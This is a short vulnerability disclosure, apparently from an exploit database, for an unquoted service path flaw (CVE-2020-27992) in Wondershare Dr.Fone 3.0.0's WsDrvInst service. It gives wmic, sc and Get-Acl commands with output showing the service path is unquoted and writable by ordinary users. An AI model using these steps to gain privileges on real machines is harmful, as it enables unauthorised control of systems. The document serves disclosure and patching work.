Wondershare Dr.Fone version 3.0.0 suffers from an unquoted service path vulnerability.
59664c74370fef3b655378cae4cd05dd
# Exploit Title: Wondershare Dr.Fone DriverInstall.exe - "WsDrvInst" Unquoted Service Path
# Date: 2020-10-29
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.wondershare.com
# Software Link: https://drfone.wondershare.com/
# Version: 3.0.0
# Tested on: Microsoft Windows 7sp2 x86/x64
# CVE : CVE-2020-27992
- C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Wondershare Driver Install Service WsDrvInst C:\Program Files (x86)\Wondershare\dr.fone\Library\DriverInstaller\DriverInstall.exe Auto
- C:\>sc query WsDrvInst
NOME_SERVIZIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
STATO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CODICE_USCITA_WIN32 : 0 (0x0)
CODICE_USCITA_SERVIZIO : 0 (0x0)
PUNTO_CONTROLLO : 0x0
INDICAZIONE_ATTESA : 0x0
- Get-Acl -Path "C:\Program Files (x86)\Wondershare\dr.fone\Library\DriverInstaller"
Directory: C:\Program Files (x86)\Wondershare\dr.fone\Library
Path Owner Access
---- ----- ------
DriverInstaller BUILTIN\Administrators BUILTIN\Users Allow FullControl...